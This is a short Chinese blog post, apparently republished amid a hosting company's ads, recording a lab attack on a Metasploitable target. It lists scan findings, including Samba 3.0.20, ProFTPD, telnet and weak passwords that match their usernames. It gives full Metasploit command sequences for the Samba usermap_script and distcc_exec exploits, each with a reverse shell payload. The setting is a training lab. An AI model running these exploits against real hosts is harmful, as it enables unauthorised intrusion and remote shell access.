Samba&distcc漏洞-创新互联

漏洞测试确实是可以的  当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。

创新互联-专业网站定制、快速模板网站建设、高性价比定远网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式定远网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖定远地区。费用合理售后完善,十年实体公司更值得信赖。

使用metasploit

对metasploitable 靶服务器进行***

metasploitable 是ubuntu8.0的版本

 

neuss扫描到漏洞

139端口可以获取该系统主机名为“METASPLOITABLE”,注释“metasploitable server (Samba 3.0.20-Debian)”;

系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;

telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令

一个distcc漏洞

一个samba 共享服务漏洞

 

 

msf对靶服务器的工具

smb-samba 共享服务

 

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost (ip address)

set lhost (ip address)

exploit

 

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost  (ip address)

set lhost  (ip address)

exploit

 

distcc 成功 但是没有root的权限

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站名称:Samba&distcc漏洞-创新互联
本文地址:http://pwwzsj.com/article/coshij.html